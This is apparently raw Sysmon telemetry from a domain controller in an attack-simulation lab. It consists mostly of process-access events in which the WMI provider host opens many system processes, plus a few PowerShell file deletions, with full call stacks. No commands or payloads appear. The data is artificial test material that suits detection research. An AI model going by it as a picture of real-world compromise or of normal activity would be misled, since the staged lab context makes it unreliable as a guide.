16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D98-603E-99AA-00000000AD01}11584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cv5tlc0o.twv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D572F6EFE3AB11B14D11CF179F525F5D,SHA256=A27DB2B8131EC06A101B87DEF43D5089719932BA4AE51DE11519171470CF5361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D98-603E-95AA-00000000AD01}6528ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9CAA-00000000AD01}13052C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9CAA-00000000AD01}13052C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 